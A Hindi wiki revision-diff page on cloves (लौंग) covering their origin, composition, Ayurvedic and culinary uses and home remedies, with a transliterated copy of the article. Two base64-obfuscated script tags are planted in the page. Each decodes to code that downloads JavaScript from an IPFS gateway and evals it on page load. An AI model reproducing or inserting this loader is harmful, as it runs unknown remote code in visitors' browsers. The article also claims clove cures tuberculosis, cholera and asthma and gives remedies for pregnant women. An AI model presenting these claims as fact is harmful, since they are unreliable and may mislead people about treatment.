Difference between revisions of "लौंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
 
===परिचय===
 
===परिचय===
लौंग (Clove, Lawang, Devkusum) का प्रयोग मसाले के तौर पर प्राचीन काल से होता चला आ रहा है। अलग-अलग स्थानों एवं भाषाओं में लौंग को भिन्न-भिन्न नामों से जाना जाता है। लौंग को अंग्रेजी में क्लोव्ह / clove कहा जाता है जो कि लैटिन के शब्द clavus, जिसका अर्थ नाखून होता है, का अंग्रेजी रूपान्तर है। लौंग के नाखून के सदृश होने के कारण ही उसका यह अंग्रेजी नाम पड़ा। लौंग का रंग काला होता है। यह एक खुशबूदार मसाला है। जिसे भोजन में स्वाद के लिए डाला जाता है। लौंग का उद्गम स्थान इंडोनेशिया को माना जाता है। ऐतिहासिक रूप से लौंग का पेड़ मोलुक्का द्वीपों का देशी वृक्ष है, जहाँ चीन ने ईसा से लगभग तीन शताब्दी पूर्व इसे खोजा और अलेक्सैन्ड्रिया में इसका आयात तक होने लगा। आज जाजीबार लौंग का सबसे अधिक उत्पादन करने वाला देश है। लौंग का अधिक मात्रा में उत्पादन जंजीबार और मलाक्का द्वीप में होता है। इसका उपयोग भारत और चीन में 2000 वर्षों से भी अधिक समय से हो रहा है। लौंग का उत्पादन मुख्य रूप से इंडोनेशिया, मेडागास्कर, भारत, पाकिस्तान, श्रीलंका आदि देशों में होता है। आपको शायद यह जानकर आश्चर्य हो कि अठारहवीं शताब्दी में ब्रिटेन में लौंग का मूल्य उसके वजन के सोने के बराबर हुआ करता था।
+
भारतीय रसोई घर और मसाले तथा इनमे लौंग और लौंग की उपयोगिता को कौन नहीं जानता। लौंग को दादी नानी के नुस्को में एक विशेष स्थान प्राप्त है। लौंग (Clove, Lawang, Devkusum) का प्रयोग मसाले के तौर पर प्राचीन काल से होता चला आ रहा है। अलग-अलग स्थानों एवं भाषाओं में लौंग को भिन्न-भिन्न नामों से जाना जाता है। लौंग को अंग्रेजी में क्लोव्ह / clove कहा जाता है जो कि लैटिन के शब्द clavus, जिसका अर्थ नाखून होता है, का अंग्रेजी रूपान्तर है। लौंग के नाखून के सदृश होने के कारण ही उसका यह अंग्रेजी नाम पड़ा। लौंग का रंग काला होता है। यह एक खुशबूदार मसाला है। जिसे भोजन में स्वाद के लिए डाला जाता है। लौंग का उद्गम स्थान इंडोनेशिया को माना जाता है। ऐतिहासिक रूप से लौंग का पेड़ मोलुक्का द्वीपों का देशी वृक्ष है, जहाँ चीन ने ईसा से लगभग तीन शताब्दी पूर्व इसे खोजा और अलेक्सैन्ड्रिया में इसका आयात तक होने लगा। आज जाजीबार लौंग का सबसे अधिक उत्पादन करने वाला देश है। लौंग का अधिक मात्रा में उत्पादन जंजीबार और मलाक्का द्वीप में होता है। इसका उपयोग भारत और चीन में 2000 वर्षों से भी अधिक समय से हो रहा है। लौंग का उत्पादन मुख्य रूप से इंडोनेशिया, मेडागास्कर, भारत, पाकिस्तान, श्रीलंका आदि देशों में होता है। आपको शायद यह जानकर आश्चर्य हो कि अठारहवीं शताब्दी में ब्रिटेन में लौंग का मूल्य उसके वजन के सोने के बराबर हुआ करता था।
  
===लौंग का पेड़===
+
===लौंग का वृक्ष===
 
लौंग मध्यम आकार का सदाबहार वृक्ष से पाया जाने वाला, सूखा, अनखुला एक ऐसा पुष्प अंकुर होता है जिसके वृक्ष का तना सीधा और पेड़ भी 10-12 मीटर की ऊँचाई तक वाला होता है। और जिसके पत्ते बड़े-बड़े तथा दीर्घवृताकार होते हैं। इसके पेड़ को लगाने के आठ या नौ वर्ष के बाद ही फल देते है। लौंग के पेड़ों के शाखों के अन्तिम छोरों में लौंग के फूल समूह में खिलते हैं। लौंग की कलियों का रंग खिलना आरम्भ होते समय पीला होता है जो कि धीरे-धीरे हरा होते जाता है और पूर्णतः खिल जाने पर इसका रंग लाल हो जाता है। इन कलियों में चार पँखुड़ियों के मध्य एक वृताकार फल होता है।
 
लौंग मध्यम आकार का सदाबहार वृक्ष से पाया जाने वाला, सूखा, अनखुला एक ऐसा पुष्प अंकुर होता है जिसके वृक्ष का तना सीधा और पेड़ भी 10-12 मीटर की ऊँचाई तक वाला होता है। और जिसके पत्ते बड़े-बड़े तथा दीर्घवृताकार होते हैं। इसके पेड़ को लगाने के आठ या नौ वर्ष के बाद ही फल देते है। लौंग के पेड़ों के शाखों के अन्तिम छोरों में लौंग के फूल समूह में खिलते हैं। लौंग की कलियों का रंग खिलना आरम्भ होते समय पीला होता है जो कि धीरे-धीरे हरा होते जाता है और पूर्णतः खिल जाने पर इसका रंग लाल हो जाता है। इन कलियों में चार पँखुड़ियों के मध्य एक वृताकार फल होता है।
  
Line 13: Line 13:
  
 
===लौंग के तत्व===
 
===लौंग के तत्व===
लौंग में मौजूद तत्वों का विश्लेषण किया जाए तो इसमें कार्बोहाइड्रेट, नमी, प्रोटीन, वाष्पशील तेल, गैर-वाष्पशील ईथर निचोड़ (वसा) और रेशों से बना होता है। इसके अलावा खनिज पदार्थ, हाइड्रोक्लोरिक एसिड में न घुलने वाली राख, कैल्शियम, फास्फोरस, लोहा, सोडियम, पोटेशियम, थायामाइन, राइबोफ्लेविन, नियासिन, विटामिन 'सी' और 'ए' जैसे तत्व भी लौंग में प्रचुर मात्रा में पाए जाते हैं। इसका ऊष्मीय मान 43 डिग्री है और इससे कई तरह के औषधीय व भौतिक तत्व लिए जा सकते हैं।  
+
लौंग में मौजूद तत्वों का विश्लेषण किया जाए तो इसमें कार्बोहाइड्रेट, नमी, प्रोटीन, वाष्पशील तेल, गैर-वाष्पशील ईथर निचोड़ (वसा) और रेशों से बना होता है। इसके अलावा खनिज पदार्थ, हाइड्रोक्लोरिक एसिड में न घुलने वाली राख, कैल्शियम, फास्फोरस, लोहा, सोडियम, पोटेशियम, थायामाइन, राइबोफ्लेविन, नियासिन, विटामिन 'सी' और 'ए' जैसे तत्व भी लौंग में प्रचुर मात्रा में पाए जाते हैं। इसके अलावा कई तरह के औषधीय तत्व होते हैं। इसका ऊष्मीय मान 43 डिग्री है और इससे कई तरह के औषधीय व भौतिक तत्व लिए जा सकते हैं।  
  
 
===लौंग एक औषधी===
 
===लौंग एक औषधी===
आयुर्वेद में लौंग का प्रयोग अनेक प्रकार की आयुर्वेदिक औषधियों के बनाने में भी किया जाता है। चीन के साथ ही साथ पश्चिम के अनेक देशों में हर्बल दवाइयाँ बनाने के लिए लौंग का प्रयोग किया जाता है। भारतीय औषधीय प्रणाली में लौंग का उपयोग कई स्थितियों में किया जाता है। अनेक रोगों के निदान के लिए आयुर्वेद में लौंग का प्रयोग चूर्ण, काढ़ा तथा तेल के रूप में किया जाता है। लौंग का तेल एक महत्वपूर्ण आयुर्वेदिक औषधि है। लौंग के तेल को औषधि के रूप में भी उपयोग में लाया जाता है। लौंग के तेल में भी ऐसे अंश होते हैं जो रक्त परिसंचरण को स्थिर करते हैं और शरीर के तापमान को नियंत्रित रखते हैं। लौंग के तेल को बाहरी त्वचा पर लगाने से त्वचा पर उत्तेजक प्रभाव दिखाई देते हैं। त्वचा लाल हो जाती है और उष्मा उत्पन्न होती है। इसके अलावा लौंग एंजाइम के बहाव को बढ़ावा देती है और पाचन क्रिया को भी तेज करती है। लौंग का तेल पानी की तुलना में भारी होता है। इसका रंग लाल होता है। सिगरेट की तम्बाकू को सुगन्धित बनाने के लिए लौंग के तेल का उपयोग होता है। इसके तेल को त्वचा पर लगाने से त्वचा के कीड़े नष्ट होते हैं।
+
आयुर्वेद में लौंग का प्रयोग अनेक प्रकार की आयुर्वेदिक औषधियों के बनाने में भी किया जाता है। चीन के साथ ही साथ पश्चिम के अनेक देशों में हर्बल दवाइयाँ बनाने के लिए लौंग का प्रयोग किया जाता है। भारतीय औषधीय प्रणाली में लौंग का उपयोग कई स्थितियों में किया जाता है। अनेक रोगों के निदान के लिए आयुर्वेद में लौंग का प्रयोग साबुत, पीसकर, चूर्ण, काढ़ा तथा तेल के रूप में किया जाता है। लौंग का तेल एक महत्वपूर्ण आयुर्वेदिक औषधि है। लौंग के तेल को औषधि के रूप में भी उपयोग में लाया जाता है। लौंग के तेल में भी ऐसे अंश होते हैं जो रक्त परिसंचरण को स्थिर करते हैं और शरीर के तापमान को नियंत्रित रखते हैं। लौंग के तेल को बाहरी त्वचा पर लगाने से त्वचा पर उत्तेजक प्रभाव दिखाई देते हैं। त्वचा लाल हो जाती है और उष्मा उत्पन्न होती है। इसके अलावा लौंग एंजाइम के बहाव को बढ़ावा देती है भूख बढ़ाती है और पाचन क्रिया को भी तेज करती है। लौंग का तेल पानी की तुलना में भारी होता है। इसका रंग लाल होता है। सिगरेट की तम्बाकू को सुगन्धित बनाने के लिए लौंग के तेल का उपयोग होता है। इसके तेल को त्वचा पर लगाने से त्वचा के कीड़े नष्ट होते हैं।  
 +
 
 +
===आयुर्वेदिक गुण===
 +
लौंग में अनेक प्रकार के औषधीय गुण होते हैं। आयुर्वेदिक मतानुसार लौंग तीखा, लघु, आंखों के लिए लाभकारी, शीतल, पाचनशक्तिवर्द्धक, पाचक और रुचिकारक होता है। यह प्यास, हिचकी, खांसी, रक्तविकार, टी.बी आदि रोगों को दूर करती है। लौंग का उपयोग मुंह से लार का अधिक आना, दर्द और विभिन्न रोगों में किया जाता है। यह दांतों के दर्द में भी लाभकारी है। ये उत्तेजना देते हैं और ऐंठनयुक्त अव्यवस्थाओं, तथा पेट फूलने की स्थिति को कम करते हैं। धीमे परिसंचरण को तेज करती है और हाजमा तथा चयापचय को बढ़ावा देती है। शोधकर्ताओं का कहना है कि भारतीय मसालों में लौंग सबसे अच्‍छा एंटी ऑक्‍सीडेंट का काम करता है। भोजन में प्राकृतिक एंटी ऑक्‍सीडेंट का इस्‍तेमाल करना स्‍वास्‍थ के लिए बेहतर है। यह कृत्रिम एंटी ऑक्‍सीडेंट से ज्‍यादा बेहतर है। एंटीसेप्टिक गुणों के कारण यह चोट, घाव, खुजली और संक्रमण में कीटों के काटने या डंक मारने पर भी किया जाता है। यूनानी चिकित्सा पद्धति के अनुसार : लौंग खुश्क, उत्तेजक और गर्म है। इसको खाने से सिर दर्द होता है। यह पाचनशक्ति को बढ़ाता है। दांतों के मसूढ़ों को मजबूत बनाता है। इसको पीसकर मालिश करने से जहर दूर होता है।
  
 
===लौंग का खानपान में इस्तेमाल===
 
===लौंग का खानपान में इस्तेमाल===
दुनिया भर के व्यञ्जनों को बनाने में प्रायः लौंग का प्रयोग एक मसाले के रूप में किया जाता है। मसाले के तौर पर लौंग का इस्तेमाल गरम मसाला में होता है। चूँकि लौंग के प्रयोग से भोजन सुस्वादु हो जाता है, सम्पूर्ण भारत में प्रायः लौंग का प्रयोग विभिन्न प्रकार के व्यञ्जन बनाने में होता है। लवंग को पीसकर रसदार सब्जियों में इस्तेमाल किया जाता है। पुलाव एवं मिट, मछली पकाते समय भी मसाले के तौर लौंग का इस्तेमाल कर सकते हैं। आजकल बहुत सी मिठाईयों को सजाने के लिए भी लौंग का प्रयोग किया जाने लगा है। कोको, चाकलेट, आइसक्रीम आदि खाद्य-पदार्थों में पाया जाने वाला बनावटी वेनीला एसेन्स लौंग से ही तैयार किया जाता है। लौंग को पान के साथ भी खाया जाता है, प्रायः पान के बीड़े में लौंग को खोंस दिया जाता है जिससे बीड़े की सुन्दरता भी बढ़ जाती है। भारत के कुछ क्षेत्रों में बिना लौंग वाला पान बीड़ा देने को अशुभ माना जाता है। लौंग की तासीर गर्म होने के कारण गर्मियों के दिनों में इसका प्रयोग कम किया जाता है। मसाला चाय बनाने के लिए भी लौंग का इस्तेमाल किया जाता है। लौंग का आसव बनाकर उसमें से सुगन्धित पदार्थ तैयार किये जाते हैं। चीन और जापान में भी एक खुशबूदार पदार्थ के रूप में लौंग को महत्वपूर्ण माना जाता है। यूरोप, एशिया और संयुक्त राज्य अमेरिका के कई क्षेत्रों में लौंग का प्रयोग एक प्रकार के सिगरेट, जिसे कि kretek कहा जाता है, बनाने के लिए भी किया जाता है।
+
दुनिया भर के व्यञ्जनों को बनाने में प्रायः लौंग का प्रयोग एक मसाले के रूप में किया जाता है। मसाले के तौर पर लौंग का इस्तेमाल गरम मसाला में होता है। चूँकि लौंग के प्रयोग से भोजन सुस्वादु हो जाता है, सम्पूर्ण भारत में प्रायः लौंग का प्रयोग विभिन्न प्रकार के व्यञ्जन बनाने में होता है। रसोईघर में लवंग को पीसकर रसदार सब्जियों में इस्तेमाल किया जाता है। पुलाव एवं मिट, मछली पकाते समय भी मसाले के तौर लौंग का इस्तेमाल कर सकते हैं। आजकल बहुत सी मिठाईयों को सजाने के लिए भी लौंग का प्रयोग किया जाने लगा है। कोको, चाकलेट, आइसक्रीम आदि खाद्य-पदार्थों में पाया जाने वाला बनावटी वेनीला एसेन्स लौंग से ही तैयार किया जाता है। लौंग को पान के साथ भी खाया जाता है, प्रायः पान के बीड़े में लौंग को खोंस दिया जाता है जिससे बीड़े की सुन्दरता भी बढ़ जाती है। भारत के कुछ क्षेत्रों में बिना लौंग वाला पान बीड़ा देने को अशुभ माना जाता है। लौंग की तासीर गर्म होने के कारण गर्मियों के दिनों में इसका प्रयोग कम किया जाता है। मसाला चाय बनाने के लिए भी लौंग का इस्तेमाल किया जाता है। लौंग का आसव बनाकर उसमें से सुगन्धित पदार्थ तैयार किये जाते हैं। चीन और जापान में भी एक खुशबूदार पदार्थ के रूप में लौंग को महत्वपूर्ण माना जाता है। यूरोप, एशिया और संयुक्त राज्य अमेरिका के कई क्षेत्रों में लौंग का प्रयोग एक प्रकार के सिगरेट, जिसे कि kretek कहा जाता है, बनाने के लिए भी किया जाता है।
 
 
===आयुर्वेदिक गुण===
 
लौंग में अनेक प्रकार के औषधीय गुण होते हैं। आयुर्वेदिक मतानुसार लौंग तीखा, लघु, आंखों के लिए लाभकारी, शीतल, पाचनशक्तिवर्द्धक, पाचक और रुचिकारक होता है। यह प्यास, हिचकी, खांसी, रक्तविकार, टी.बी आदि रोगों को दूर करती है। लौंग का उपयोग मुंह से लार का अधिक आना, दर्द और विभिन्न रोगों में किया जाता है। यह दांतों के दर्द में भी लाभकारी है। ये उत्तेजना देते हैं और ऐंठनयुक्त अव्यवस्थाओं, तथा पेट फूलने की स्थिति को कम करते हैं। धीमे परिसंचरण को तेज करती है और हाजमा तथा चयापचय को बढ़ावा देती है। यूनानी चिकित्सा पद्धति के अनुसार : लौंग खुश्क, उत्तेजक और गर्म है। इसको खाने से सिर दर्द होता है। यह पाचनशक्ति को बढ़ाता है। दांतों के मसूढ़ों को मजबूत बनाता है। इसको पीसकर मालिश करने से जहर दूर होता है।
 
  
 
===लौंग का चिकित्सा में इस्तेमाल===
 
===लौंग का चिकित्सा में इस्तेमाल===

Revision as of 15:10, 21 July 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

parichay

bharatiy rasoee ghar aur masale tatha iname lauang aur lauang ki upayogita ko kaun nahian janata. lauang ko dadi nani ke nusko mean ek vishesh sthan prapt hai. lauang (Clove, Lawang, Devkusum) ka prayog masale ke taur par prachin kal se hota chala a raha hai. alag-alag sthanoan evan bhashaoan mean lauang ko bhinn-bhinn namoan se jana jata hai. lauang ko aangreji mean klovh / clove kaha jata hai jo ki laitin ke shabd clavus, jisaka arth nakhoon hota hai, ka aangreji roopantar hai. lauang ke nakhoon ke sadrish hone ke karan hi usaka yah aangreji nam p da. lauang ka rang kala hota hai. yah ek khushaboodar masala hai. jise bhojan mean svad ke lie dala jata hai. lauang ka udgam sthan iandoneshiya ko mana jata hai. aitihasik roop se lauang ka pe d molukka dvipoan ka deshi vriksh hai, jahaan chin ne eesa se lagabhag tin shatabdi poorv ise khoja aur aleksaindriya mean isaka ayat tak hone laga. aj jajibar lauang ka sabase adhik utpadan karane vala desh hai. lauang ka adhik matra mean utpadan janjibar aur malakka dvip mean hota hai. isaka upayog bharat aur chin mean 2000 varshoan se bhi adhik samay se ho raha hai. lauang ka utpadan mukhy roop se iandoneshiya, medagaskar, bharat, pakistan, shrilanka adi deshoan mean hota hai. apako shayad yah janakar ashchary ho ki atharahavian shatabdi mean briten mean lauang ka mooly usake vajan ke sone ke barabar hua karata tha.

lauang ka vriksh

lauang madhyam akar ka sadabahar vriksh se paya jane vala, sookha, anakhula ek aisa pushp aankur hota hai jisake vriksh ka tana sidha aur pe d bhi 10-12 mitar ki ooanchaee tak vala hota hai. aur jisake patte b de-b de tatha dirghavritakar hote haian. isake pe d ko lagane ke ath ya nau varsh ke bad hi phal dete hai. lauang ke pe doan ke shakhoan ke antim chhoroan mean lauang ke phool samooh mean khilate haian. lauang ki kaliyoan ka rang khilana arambh hote samay pila hota hai jo ki dhire-dhire hara hote jata hai aur poornatah khil jane par isaka rang lal ho jata hai. in kaliyoan mean char pankhu diyoan ke madhy ek vritakar phal hota hai.

lauang ke prakar

lauang, jise ki lavaang ke nam se bhi jana jata hai, Myrtaceae parivar se sambandhit ek pe d ki sookhi kali ko kahate haian jo ki khushaboodar hota hai. lauang ushn prakriti ka masala hai. lauang do prakar ke hote haian. ek kale rang ki evan doosari nile rang ki. amataur par gharoan mean masale ke taur par istemal hone vala lauang kale rang ka hota hai. nile rang ka lauang adhik tailiy hota hai at: inase mashin dvara tel nikala jata hai jinaka upayog chikitsa mean kiya jata hai. isake patte bhi masale ke taur par istemal kiye jate haian. lavang ek khushaboodar masala hota hai.

lauang ki pahachan

achchhe lavang ki pahachan hai usaki khushaboo evan tailiyapan. lauang kharidate samay use datoan mean dabakar dekhana chahie isase lavang ki gunavatta pata chal jati hai. jo lauang sugandh mean tej, svad mean tikhi ho aur dabane mean tel ka abhas ho usi lauang ko achchha manana chahie. vyapari lauang mean tel nikala hua lauang mila dete hai. agar lauang mean jhurriya p di ho to samajhe ki yah tel nikali huee lauang hai.

lauang ke tatv

lauang mean maujood tatvoan ka vishleshan kiya jae to isamean karbohaidret, nami, protin, vashpashil tel, gair-vashpashil eethar nicho d (vasa) aur reshoan se bana hota hai. isake alava khanij padarth, haidroklorik esid mean n ghulane vali rakh, kailshiyam, phasphoras, loha, sodiyam, poteshiyam, thayamain, raibophlevin, niyasin, vitamin 'si' aur 'e' jaise tatv bhi lauang mean prachur matra mean pae jate haian. isake alava kee tarah ke aushadhiy tatv hote haian. isaka ooshmiy man 43 digri hai aur isase kee tarah ke aushadhiy v bhautik tatv lie ja sakate haian.

lauang ek aushadhi

ayurved mean lauang ka prayog anek prakar ki ayurvedik aushadhiyoan ke banane mean bhi kiya jata hai. chin ke sath hi sath pashchim ke anek deshoan mean harbal davaiyaan banane ke lie lauang ka prayog kiya jata hai. bharatiy aushadhiy pranali mean lauang ka upayog kee sthitiyoan mean kiya jata hai. anek rogoan ke nidan ke lie ayurved mean lauang ka prayog sabut, pisakar, choorn, kadha tatha tel ke roop mean kiya jata hai. lauang ka tel ek mahatvapoorn ayurvedik aushadhi hai. lauang ke tel ko aushadhi ke roop mean bhi upayog mean laya jata hai. lauang ke tel mean bhi aise aansh hote haian jo rakt parisancharan ko sthir karate haian aur sharir ke tapaman ko niyantrit rakhate haian. lauang ke tel ko bahari tvacha par lagane se tvacha par uttejak prabhav dikhaee dete haian. tvacha lal ho jati hai aur ushma utpann hoti hai. isake alava lauang eanjaim ke bahav ko badhava deti hai bhookh badhati hai aur pachan kriya ko bhi tej karati hai. lauang ka tel pani ki tulana mean bhari hota hai. isaka rang lal hota hai. sigaret ki tambakoo ko sugandhit banane ke lie lauang ke tel ka upayog hota hai. isake tel ko tvacha par lagane se tvacha ke ki de nasht hote haian.

ayurvedik gun

lauang mean anek prakar ke aushadhiy gun hote haian. ayurvedik matanusar lauang tikha, laghu, aankhoan ke lie labhakari, shital, pachanashaktivarddhak, pachak aur ruchikarak hota hai. yah pyas, hichaki, khaansi, raktavikar, ti.bi adi rogoan ko door karati hai. lauang ka upayog muanh se lar ka adhik ana, dard aur vibhinn rogoan mean kiya jata hai. yah daantoan ke dard mean bhi labhakari hai. ye uttejana dete haian aur aianthanayukt avyavasthaoan, tatha pet phoolane ki sthiti ko kam karate haian. dhime parisancharan ko tej karati hai aur hajama tatha chayapachay ko badhava deti hai. shodhakartaoan ka kahana hai ki bharatiy masaloan mean lauang sabase achh‍chha eanti aaukh‍sideant ka kam karata hai. bhojan mean prakritik eanti aaukh‍sideant ka ish‍temal karana sh‍vash‍th ke lie behatar hai. yah kritrim eanti aaukh‍sideant se jh‍yada behatar hai. eantiseptik gunoan ke karan yah chot, ghav, khujali aur sankraman mean kitoan ke katane ya dank marane par bhi kiya jata hai. yoonani chikitsa paddhati ke anusar : lauang khushk, uttejak aur garm hai. isako khane se sir dard hota hai. yah pachanashakti ko badhata hai. daantoan ke masoodhoan ko majaboot banata hai. isako pisakar malish karane se jahar door hota hai.

lauang ka khanapan mean istemal

duniya bhar ke vyanjanoan ko banane mean prayah lauang ka prayog ek masale ke roop mean kiya jata hai. masale ke taur par lauang ka istemal garam masala mean hota hai. chooanki lauang ke prayog se bhojan susvadu ho jata hai, sampoorn bharat mean prayah lauang ka prayog vibhinn prakar ke vyanjan banane mean hota hai. rasoeeghar mean lavang ko pisakar rasadar sabjiyoan mean istemal kiya jata hai. pulav evan mit, machhali pakate samay bhi masale ke taur lauang ka istemal kar sakate haian. ajakal bahut si mithaeeyoan ko sajane ke lie bhi lauang ka prayog kiya jane laga hai. koko, chakalet, aisakrim adi khady-padarthoan mean paya jane vala banavati venila esens lauang se hi taiyar kiya jata hai. lauang ko pan ke sath bhi khaya jata hai, prayah pan ke bi de mean lauang ko khoans diya jata hai jisase bi de ki sundarata bhi badh jati hai. bharat ke kuchh kshetroan mean bina lauang vala pan bi da dene ko ashubh mana jata hai. lauang ki tasir garm hone ke karan garmiyoan ke dinoan mean isaka prayog kam kiya jata hai. masala chay banane ke lie bhi lauang ka istemal kiya jata hai. lauang ka asav banakar usamean se sugandhit padarth taiyar kiye jate haian. chin aur japan mean bhi ek khushaboodar padarth ke roop mean lauang ko mahatvapoorn mana jata hai. yoorop, eshiya aur sanyukt rajy amerika ke kee kshetroan mean lauang ka prayog ek prakar ke sigaret, jise ki kretek kaha jata hai, banane ke lie bhi kiya jata hai.

lauang ka chikitsa mean istemal

bharat ke prachin chikitsa vijnan mean lauang ka upayog chikitsa ke lie kiye jane ka jikr hua hai. daant dard hone par lauang ki ek kali daant ke niche rakhane se dard se turant aram milata hai. chot lagane par lauang ki kuchh kaliyoan ko sarasoan tel / kapoor ke tel mean pakakar malish karane se labh milata hai. soojan hone par lauang ke tel se malish karani chahie. khaansi hone par lauang ko choosane se phayada hota hai. jaldi-jaldi pyas lagane par misari evan lauang ko pisakar khane se jaldi pyas nahian lagati hai. lavang ki kuchh kaliyoan ko pani mean ubalakar garara karane se gale mean hone vala dard kam hota hai. aisa karane se payariya mean bhi labh milata hai. daant ke dard mean bhi lauang upayog hoti hai aur isake entiseptik gun daantoan ke sankraman ko kam karata hai. lauang ek aisa masala hai jo dant kshay ko rokata hai aur muanh ki durgandh ko door bhagata hai. namak ke sath lauang chabane se kaphotsaran (thookane) mean asani hoti hai, gale ka dard kam ho jata hai aur grasani ki jalan bhi band ho jati hai. grasani shoth ke karan hone vali khaansi ko door karane ke lie jale hue lauang ko chabana achchha hota hai. kshay rog, dama aur shravasani shoth se hone vali dardabhari khaansiyoan ko kam karane ke lie lahasun ki ek kali ko shahad ke sath milaean aur usamean tin se paanch lauang ke tel ki booandean dalean. sone se pahale ise ek bar lene se kaphi aram milega. garbhavati striyoan ko ulti hone par lauang ko garm pani mean bhigokar usaka pani pilane se labh hota hai. yadi bhune hue lauang ke choorn ko shahad ke sath milakar le liya jae to ultiyoan par kaboo paya ja sakata hai kyoanki lauang ke sanjnahari prabhav se pet aur halak sunn ho jate haian aur ultiyaan ruk jati haian. haije ke upachar mean bhi lauang bahut upayogi siddh hoti hai. isake lie char gram lauang ko tin litar pani mean tab tak ubala jata hai jab tak ki adha pani bhap banakar gayab n ho jae. is pani ko pine se rog ke tivr lakshan turant kaboo mean a jate haian. yah pet ke dard ko mitane vala mana jata hai. isake alava eeran aur chin mean to aisa bhi mana jata tha ki lauang mean kamottejak gun hote haian. lauang se dame ka bahut prabhavi ilaj hota hai. chhah lauang ki kaliyoan ko 30 mi.li. pani ke sath ubalakar kadha banakar ise shahad ke sath din mean tin bar lena chahie, isase kaphotsaran mean asani hoti hai. peshiyoan ki aianthan mean lauang ke tel ki pulatis prabhavit kshetr par lagane se yah thik ho jati hai. namak ke kristal aur lauang ko doodh mean milakar taiyar vilep lagane se siradard thik ho jata hai. barauni ke asapas ki jalan ko thik karane ke lie bhi lauang prabhavi hoti hai. pani mean lauang ko ghisakar prabhavit jagah par lagane se sukoon milata hai.

hanikarak

lauang atyant garm hota hai at: adhik matra mean isaka sevan karana nukasanadey ho sakata hai at: lauang jaroorat se adhik nahi khana chahie. jyada lauang khane se gurde aur aantoan ko nukasan pahuanch sakata hai. babool ka goand, lauang mean vyapt doshoan ko door karata hai. matra :- 1 gram se 3 gram tak.

vibhinn bhashaoan mean lauang ke nam
bhasha nam
hindi lauang.
aangrezi klabj (CLOVES).
sanskrit lavang, devakusum.
marathi lavang.
gujarati laviang.
bangali lavang.
tailagi/telugu labangal,lavaangam.
malayalam grampoo.
pharasi darakhte mehak.
arabi mikhakarkan, phool.
laitin kareyaphailaseroan matikash.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh